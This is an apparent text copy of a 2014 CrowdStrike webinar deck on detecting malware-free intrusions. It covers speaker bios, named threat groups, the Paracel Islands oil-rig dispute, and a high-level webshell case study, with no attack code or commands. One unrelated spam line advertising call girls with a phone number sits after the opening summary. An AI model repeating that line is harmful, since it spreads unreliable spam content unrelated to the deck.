This document summarizes a CrowdStrike webinar on detecting advanced malware-free intrusions. It describes three speakers from CrowdStrike - Dmitri Alperovitch, Chris Scott, and Adam Meyers. The webinar then discusses how adversaries like China and various state-sponsored and criminal groups are adapting their tactics to evade detection, and how security teams must also adapt detection methods to focus on real-time monitoring rather than indicators of compromise. The webinar includes a case study of detecting a webshell attack in near real-time using CrowdStrike Falcon Host and concludes with a demonstration of its endpoint protection capabilities.
08448380779 Call Girls In Friends Colony Women Seeking Men
CrowdCasts Monthly: When Pandas Attack
1. WHEN PANDAS ATTACK
HOW TO DETECT, ATTRIBUTE, AND RESPOND TO
MALWARE-FREE INTRUSIONS
Dmitri Alperovitch - Chris Scott - Adam Meyers
2. TODAY’S SPEAKERS
2014 CrowdStrike, Inc. All rights reserved. 2
@DMITRICYBER
@CROWDSTRIKE | #CROWDCASTS
DMITRI ALPEROVITCH | CO-FOUNDER & CTO
Dmitri Alperovitch is the Co-Founder and CTO of CrowdStrike. A
renowned computer security researcher, he is a thought-leader on cybersecurity
policies and state tradecraft. Prior to founding CrowdStrike, Dmitri was a Vice
President of Threat Research at McAFee, where he led the company’s global
internet threat intelligence analysis and investigations. In 2010 and 2011,
Alperovitch led the global team that investigated and brought to light Operation
Aurora, Night Dragon and Shady RAT groundbreaking cyberespionage intrusions,
and gave thoses incidents their names.
3. TODAY’S SPEAKERS
2014 CrowdStrike, Inc. All rights reserved. 3
@NETOPSGURU
@CROWDSTRIKE | #CROWDCASTS
CHRIS SCOTT | DIRECTOR, SERVICES
Christoper Scott has over 15 years of Fortune 500/DoD/DIB
business proficiency, including more than 7 years of targeted threat detection
and prevention expertise. As a Director at CrowdStrike Services, Christopher
supports a variety of engagements that include: security reviews, incident
response, data loss prevention, insider threat analysis and engineering threat
detection systems, business continuity and disaster recovery processes. In
addition, Christopher assists in building risk recognition systems and advancing
the CrowdStrike Services practice.
4. TODAY’S SPEAKERS
2014 CrowdStrike, Inc. All rights reserved. 4
@ADAM_CYBER
@CROWDSTRIKE | #CROWDCASTS
ADAM MEYERS | VP, INTELLIGENCE
Adam Meyers has over a decade of experience within the
information security industry. He has authored numerous papers that have
appeared at peer reviewed industry venues and has received awards for his
dedication to the field. At CrowdStrike, Adam serves as the VP of Intelligence.
Within this role it is Adam’s responsibility to oversee all of CrowdStrike’s
intelligence gathering and cyber-adversarial monitoring activities. Adam’s Global
Intelligence Team supports both the Product and Services divisions at CrowdStrike
and Adam manages these endeavors and expectations.
5. @CROWDSTRIKE | #CROWDCASTS
ADVANCED ATTACKERS EVADE
IOC-BASED DETECTION
HOW CAN YOU FIND AN ATTACK WHEN THERE
IS NO MALWARE, NO COMMAND AND CONTROL,
AND NO FILE-BASED ARTIFACTS?
2014 CrowdStrike, Inc. All rights reserved. 5
7. @CROWDSTRIKE | #CROWDCASTS
2014 CrowdStrike, Inc. All rights reserved. 7
LET’S DIVE IN…
WHO’S BEHIND THE ATTACK?
8. UNCOVER THE ADVERSARY @CROWDSTRIKE | #CROWDCASTS
RUSSIA
Energetic Bear: Oil and Gas
Companies
HACTIVIST/TERRORIST
2014 CrowdStrike, Inc. All rights reserved. 8
CHINA
Comment Panda: Commercial, Government, Non-profit
Deep Panda: Financial, Technology, Non-profit
Foxy Panda: Technology & Communications
Anchor Panda: Government organizations, Defense &
Aerospace, Industrial Engineering, NGOs
Impersonating Panda: Financial Sector
Karma Panda: Dissident groups
Keyhole Panda: Electronics & Communications
Poisonous Panda: Energy Technology, G20,
NGOs, Dissident Groups
Putter Panda: Governmental & Military
Toxic Panda: Dissident Groups
Union Panda: Industrial companies
Vixen Panda: Government
IRAN
INDIA
Viceroy Tiger: Government, Legal,
Financial, Media, Telecom
NORTH KOREA
Silent Chollima:
Government, Military,
Financial
Magic Kitten: Dissidents
Cutting Kitten: Energy Companies
CRIMINAL
Singing Spider: Commercial, Financial
Union Spider: Manufacturing
Andromeda Spider: Numerous
Deadeye Jackal: Commercial, Financial,
Media, Social Networking
Ghost Jackal: Commercial, Energy,
Financial
Corsair Jackal: Commercial, Technology,
Financial, Energy
Extreme Jackal: Military, Government
9. PARCEL ISLANDS
Disputed Territory
• 16°40′N 112°20′E
• Claimed by:
– Vietnam (Hoàng Sa Archipelago)
– Peoples Republic of China (Xisha Islands)
– Taiwan
• Originally occupied by French in 1938,
the islands were taken by Japan and
then China post World War II
• In 1974 armed conflict saw the
occupation of the islands by victorious
PLA forces over ARVN. Unified
Socialist Vietnam renewed claims
2014 CrowdStrike, Inc. All rights reserved. 9
10. HAIYANG SHIYOU 981
May 2, 2014
• Owned by: CNOOC Group
– Displacement: 30,670 tons
– Length: 114 meters
– Beam: 90 meters
– Speed: 8 knots
– Crew: 160
• Mission: Evaluate potential for Oil
Reserves
• In theater 2 May – 16 Jul
2014 CrowdStrike, Inc. All rights reserved. 10
11. CHINESE INTRUSION ACTIVITY
May/June
2014 CrowdStrike, Inc. All rights reserved. 11
CHINESE INTRUSION ACTIVITY
Increasing activity as conflict escalates
12. Increasing tensions and intrigue
2014 CrowdStrike, Inc. All rights reserved. 12
HD981 OPERATIONS MAY - JULY
2 May
HD981
deployed
near Parcel
Islands
26 May
Vietnamese
fishing boat
sinks after
confrontation
with Chinese
vessels
June tensions
continue to
rise as HD981
moves closer
to Parcel
Islands and
conducts
drilling
16 July
HD981 leaves
the Parcel
Islands in
advance of
typhoon
season and
to ‘review
data’ from
drilling
operations
13. Mid June 2014
• Sunni extremists from the ISIS begin
advance on key Iraqi industrial city Baiji
• 12 June, ISIS vehicles and personnel burn
down courthouse and police station, and
release prisoners from jail
• 18 June ISIS insurgents begin attacking Baiji
refinery the largest in Iraq, this has the
capability to refine over 300,000 barrels of oil
per day
2014 CrowdStrike, Inc. All rights reserved. 13
ISLAMIC STATE OF IRAQ AND SYRIA (ISIS)
Baiji
14. Top Oil Imports
2014 CrowdStrike, Inc. All rights reserved. 14
CHINA OIL AT RISK
15. 2014 CrowdStrike, Inc. All rights reserved. 15
WHAT HAPPENED?
THIS IS A STORY OF THE INCIDENT…
@CROWDSTRIKE | #CROWDCASTS
16. 2014 CrowdStrike, Inc. All rights reserved. 16
CASE STUDY: WEBSHELL ATTACK
• Suspicious Logins Detected within Environment
• Falcon Host Deployed to the Network with CSOC Monitoring
– Deployment Time is now Hours not Days
– The Cloud Allows Rapid Deployment and Increased Visibility
• Not Dependent on Hardware
• No Infrastructure to Standup
• Visibility on Adversary Actions
– Webshell Deployments and Usage
– Usage of Sticky Keys
– Usage of PowerShell with Custom Encryption
17. 2014 CrowdStrike, Inc. All rights reserved. 17
CASE STUDY: WEBSHELL ATTACK
• Watching the Adversary Change TTPs in Real-time
– Uploading New Tools, Monitoring for Logons
• Security Teams able to Respond within Minutes
– Removal of Infected Machines
– Memory Capture with Attacker Tools Running
• Reduction in Incident Response Timing
– Remediate Quicker
– Reduce the Need for Deep Dive Forensics
– Reduce the Cost of Incident Response
• Continued Visibility Going Forward
– Detections Allowing Security Teams to Prevent Attacker Foothold
18. @CROWDSTRIKE | #CROWDCASTS
2014 CrowdStrike, Inc. All rights reserved. 18
ADVERSARIES
ADJUSTING TTPS
Changes to Persistence
• Moving from Workstations back to Servers
• Reducing Footprint
Forensic Evidence Reduction
• Utilizing Memory for Execution, Compression,
Exfiltration
• Automated Cleanup Processes
Simplified Toolsets and Communication
Webshells
• Compiled on the Fly, Direct to Memory
• Utilize SSL Certificates on External Accessible Sites
• Utilize Custom Encryption within Microsoft
PowerShell
19. 2014 CrowdStrike, Inc. All rights reserved. 19
SECURITY TEAMS
MUST ADJUST
@CROWDSTRIKE | #CROWDCASTS
New Detection Methods
• Must be Realtime or Near-Realtime, Sweeping for
IOCs is a Losing Proposition
• Must Detect Credential Theft as it Happens
• Must Capture Adversaries Commands as Forensics
are Being Reduced
Benefits of Detection Methods
• Able to Respond Quicker
• Reduce Exposure and Loss
• Allow Security Teams to Adjust to Adversary TTPs on
the Fly
• Increasing Costs to the Adversary
20. 2014 CrowdStrike, Inc. All rights reserved. 20
NOW WHAT?
HOW DID WE DETECT AND ATTRIBUTE
THIS MALWARE-FREE INTRUSION?
@CROWDSTRIKE | #CROWDCASTS
22. REAL-TIME STATEFUL EXECUTION INSPECTION
Email
Received
Process Silently
Executed
Executable
Hides Itself From
Task Manager
Executable
Call Out to
the Internet
Email Attachment
Opened in
Acrobat Reader
Executable Saved in
Windows/System32
Folder
Executable
Modifies Windows
Registry to Autostart
1 2 3 4 5 6 7
2014 CrowdStrike, Inc. All rights reserved. 22
23. 2014 CrowdStrike, Inc. All rights reserved. 23
LET’S TAKE A LOOK…
ENDPOINT PROTECTION
DEMO
@CROWDSTRIKE | #CROWDCASTS
24. Q&A @CROWDSTRIKE | #CROWDCASTS
Please enter all questions
in the Q&A panel of
GoToWebinar
For information on the CrowdStrike
Falcon Platform or CrowdStrike Services,
contact sales@crowdstrike.com
Q&A
2014 CrowdStrike, Inc. All rights reserved. 24